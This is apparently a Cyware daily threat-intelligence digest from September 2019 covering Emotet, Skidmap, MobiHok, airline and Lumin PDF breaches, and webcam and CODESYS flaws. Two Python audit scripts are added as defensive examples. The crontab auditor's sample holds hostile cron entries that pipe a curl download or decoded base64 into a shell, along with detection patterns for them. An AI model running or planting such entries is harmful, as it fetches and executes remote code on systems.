
Cyware Daily Threat Intelligence, September 17, 2019


After lying dormant for nearly four months, Emotet is back in an active spam distribution campaign. Security experts have unearthed multiple malicious emails that contain templates written in German, Polish or Italian. The malicious email is sent in English as well with the subject line ‘Payment Remittance Advice’. Once executed, the trojan attempts to spread laterally across the network, apart from stealing passwords from installed applications.

Two new malware families capable of infiltrating Linux machines and Android phones were also discovered in the past 24 hours: Skidmap and MobiHok RAT respectively. While Skidmap is installed via crontab, MobiHok RAT is offered for sale on a prominent English-language hacking forum.

Two databases, one with 21 million records and the other with 14 million entries, have been circulating on various data exchange forums for at least a month. Most of these entries were created in May 2019, mainly for Malindo Air and Thai Lion Air.

The past 24 hours also saw the discovery of a significant number of vulnerable private web-connected cameras that can be accessed remotely by attackers. The affected devices include the likes of AXIS net cameras, Cisco Linksys webcam, IP Camera Logo Server, IP WebCam, and WebCamXP 5, among others.

Top Breaches Reported in the Last 24 Hours

24.3 million Lumin PDF users affected
Details of over 24.3 million Lumin PDF users have been shared on a hacking forum. The incident has occurred due to a MongoDB database that was left exposed online without a password back in April 2019. This enabled the hacker to download a 2.25GB ZIP file that included a 4.06GB CSV file containing the user records of 24,386,039 Lumin PDF users.
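The Lumin PDF exposure came down to a database that accepted connections without a password. As an added example (not Cyware's or Lumin's code), the following Python audit reads a mongod.conf and reports the two settings that together produce that situation: `security.authorization` left off and `net.bindIp` opened to every interface. Both configuration texts are constructed for the example; the parser assumes the flat two-level layout mongod.conf normally uses and is not a general YAML parser.

```python
import re

# Constructed example of a mongod.conf that leaves the database open (not from the page)
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0
"""

# Constructed example with authentication enforced and the listener restricted
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""


def parse_sections(text):
    """Minimal parser for the 'section:\\n  key: value' layout of mongod.conf.

    Assumption: no nesting deeper than two levels and no '#' inside values.
    """
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()  # drop comments
        if not line.strip():
            continue
        if not line.startswith(" ") and line.endswith(":"):
            section = line[:-1].strip()
            conf.setdefault(section, {})
        elif section is not None and ":" in line:
            key, value = line.strip().split(":", 1)
            conf[section][key.strip()] = value.strip()
    return conf


def audit_mongod_conf(text):
    """Return a list of findings; an empty list means the two checks passed."""
    conf = parse_sections(text)
    findings = []

    auth = conf.get("security", {}).get("authorization", "disabled")
    if auth != "enabled":
        findings.append(
            "security.authorization is not 'enabled': any client that can reach "
            "the port can read and dump every collection"
        )

    net = conf.get("net", {})
    bind = net.get("bindIp", "127.0.0.1")  # mongod defaults to localhost-only
    listens_everywhere = (
        "0.0.0.0" in bind
        or "::" in [b.strip() for b in bind.split(",")]
        or net.get("bindIpAll", "false").lower() == "true"
    )
    if listens_everywhere:
        findings.append(f"net.bindIp={bind!r}: the listener is reachable from all interfaces")

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod_conf(conf) or ["no findings"])
```

Either finding on its own is already a problem; the combination is what turns a development default into a publicly downloadable dump, so the audit is worth running on every host that carries a mongod.conf, not only the ones believed to be internal.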

Thai Lion Air and Malindo Air data breach
Two popular airlines, Thai Lion Air and Malindo Air, have exposed around 35 million records due to unsecured databases. The leaked details include passenger and reservation IDs, physical addresses, phone numbers, email addresses, names, dates of birth, passport numbers, and passport expiration dates. The two databases have been dumped on multiple forums that are linked to an open AWS bucket discovered on August 10, 2019.

Top Malware Reported in the Last 24 Hours

Emotet trojan returns
The notorious Emotet trojan has made a comeback after a four-month hiatus. The malware has been observed in a new spam campaign that is carried out through phishing emails. The emails contain templates written in four languages: German, Polish, Italian and English. The phishing email written in the English template goes with the subject line ‘Payment Remittance Advice’.

Skidmap malware
Skidmap is a newly discovered malware that affects Linux machines. It hides its malicious activities by displaying fake network traffic stats. The malware uses LKM rootkits to overwrite or modify parts of the kernel while conducting its cryptocurrency mining operations under the radar. The malware installs itself via crontab.
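Skidmap's crontab persistence is the part of the chain a defender can inspect without any kernel tooling. As an added example (not Cyware's code, and not derived from any real Skidmap sample, whose cron entries the briefing does not give), the Python below audits user-crontab text for the three patterns that cryptominer droppers on Linux commonly rely on: piping a download straight into a shell, decoding base64 into a shell, and running a program out of a world-writable temp directory. The crontab content is constructed, including the 203.0.113.10 address (a documentation range), and the parser assumes the user-crontab layout without the extra user field found in /etc/crontab.

```python
import re

# Constructed sample crontab (not from the page or from any real Skidmap sample)
SAMPLE_CRONTAB = """\
# constructed example
0 2 * * * /usr/bin/backup --full
*/10 * * * * curl -s http://203.0.113.10/x.sh | sh
@reboot /tmp/.cache/run
30 4 * * * echo aGVsbG8= | base64 -d | bash
"""

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Each rule: compiled pattern applied to the command part of an entry, plus the reason reported
RULES = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
     "downloads content and pipes it straight into a shell"),
    (re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba)?sh\b"),
     "decodes base64 and pipes it into a shell"),
    (re.compile(r"(^|\s)(" + "|".join(re.escape(d) for d in TEMP_DIRS) + r")\S*"),
     "runs a program from a world-writable temp directory"),
]


def split_entry(line):
    """Return the command part of a crontab entry, or None for blank, comment,
    environment-assignment or malformed lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", stripped):
        return None  # e.g. PATH=/usr/bin
    if stripped.startswith("@"):  # @reboot, @daily, ...
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = stripped.split(None, 5)  # five schedule fields, then the command
    return parts[5] if len(parts) == 6 else None


def audit_crontab(text):
    """Return (line_number, command, reason) for every entry that trips a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        command = split_entry(line)
        if command is None:
            continue
        for pattern, reason in RULES:
            if pattern.search(command):
                findings.append((lineno, command, reason))
    return findings


if __name__ == "__main__":
    for lineno, command, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {reason}: {command}")
```

Run it over the output of `crontab -l` for every account, and separately over the files under /etc/cron.d after stripping the user field; an entry that trips a rule is a lead, not a verdict, but on a host whose network counters look implausibly clean, as Skidmap arranges, it is the cheapest place to start.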

MobiHok Android malware
A new piece of Android malware named MobiHok RAT has been spotted by researchers. The malware borrows its code from the old SpyNote RAT. It is offered for sale on a prominent English-language hacking forum by a threat actor named mobeebom. MobiHok is written in Visual Basic .NET and Android Studio.

Fraudulent purchase of digital certificates
A new threat actor has been found duping certificate authorities into issuing digital certificates that can be used to spread malware. These certificates are then sold to potential buyers on the black market. Researchers have discovered that the threat actor obtains these legitimate digital certificates by impersonating a company’s executive.

A phishing attack on SecureDrop site
A phishing page that impersonated The Guardian’s SecureDrop site was found being used to harvest the unique ‘codename’ from sources who submitted information using the service. The phishing page also promoted an Android app that allowed attackers to perform a variety of malicious activities on a victim’s device, including executing malicious commands and monitoring the victim’s location, calls, texts, and data.

Top Vulnerabilities Reported in the Last 24 Hours

Vulnerable webcams
Over 15,000 potentially accessible webcams have been found vulnerable to an authentication bypass. Researchers have uncovered that the settings of many of them can be manipulated, while some can be hacked using standard default credentials to obtain admin-level access. The affected devices include AXIS net cameras, Cisco Linksys webcam, IP Camera Logo Server, IP WebCam, Mega-Pixel IP Camera, and Mobotix.

Vulnerabilities in CODESYS industrial products
The CODESYS industrial products, manufactured by the Germany-based company 3S-Smart Software Solutions, were found to be riddled with several critical and high-severity vulnerabilities. A critical vulnerability in a gateway component of the CODESYS V3 automation platform affected the products CODESYS Control, Gateway V3, and V3 Development System. A flaw in another V3 component could give an attacker access to PLC traffic in order to gather user credentials, and a further flaw could result in a DoS condition.


Posted on: September 17, 2019